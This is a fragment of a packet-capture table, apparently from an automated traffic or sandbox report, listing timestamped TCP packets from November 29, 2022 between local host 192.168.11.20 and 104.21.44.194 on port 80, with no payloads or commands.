                                                                          Nov 29, 2022 09:20:40.538731098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538754940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538769007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538780928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538791895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538803101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538815022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538826942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538837910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538847923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538858891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538866043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538870096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538880110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538891077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538902044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538912058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538923025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538933992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538944006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538954973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538965940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538976908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538997889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539030075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539031029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539031982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539041996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539052963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539063931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539073944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539084911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539096117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539105892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539273024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539298058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539309025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539319992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539330959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539341927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539352894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539364100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539367914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539376020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539387941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539398909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539408922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539419889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539433002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539577007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539581060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539604902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539617062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539628029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539638996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539649010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539659977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539670944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539680958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539691925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539701939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539712906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539714098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539724112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539733887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539745092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539756060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539766073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539777040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539788008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539865017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540133953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540146112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540158033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540169954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540182114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540194035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540205002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540216923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540229082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540240049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540251970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540263891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540275097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540287018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540399075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540399075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540568113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540571928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540571928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540579081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540590048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540601015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540611982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540621996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540632963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540643930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540654898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540854931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540867090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540894985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540920019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540930986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540941954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540956020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540966988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540977955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540987968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540998936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541009903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541019917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541030884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541042089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541044950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541044950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541044950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541044950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541053057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541064024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541074991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541085005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541114092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541125059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541136980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541147947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541172028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541182995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541193008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541203976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541220903 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541246891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541246891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541246891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541246891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541398048 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541398048 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541398048 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541398048 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541426897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541439056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541464090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541475058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541714907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541727066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541737080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541748047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541754007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541758060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541769028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541779041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541790009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541800022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541810989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541821957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541835070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541845083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541856050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541867018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541879892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541889906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541901112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541912079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541923046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.541924953 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.541934013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542112112 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542112112 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542112112 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542112112 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542112112 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542161942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542172909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542184114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542193890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542203903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542215109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542224884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542236090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542247057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542256117 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542256117 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542257071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542268038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542435884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542435884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542435884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542447090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542473078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542484999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542495966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542506933 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542594910 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542704105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542715073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542726040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542736053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542741060 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542747021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542757988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542768002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542778969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542788982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542799950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542911053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542911053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542911053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.542982101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.542993069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543004036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543014050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543025017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543035984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543045998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543056965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543066978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543077946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543083906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543087959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543098927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543109894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543122053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543133020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543143988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543154955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543167114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543179035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543190002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543200970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543277979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543277979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543277979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543277979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543277979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543287992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543312073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543313026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543323994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543334007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543495893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543495893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543495893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543495893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543495893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543555975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543566942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543577909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543589115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543598890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543610096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543621063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543631077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543642044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543652058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543683052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543708086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543719053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543731928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543744087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543754101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543765068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543776989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543788910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543800116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543811083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543821096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543833971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.543838978 CET4985280192.168.11.20104.21.44.194
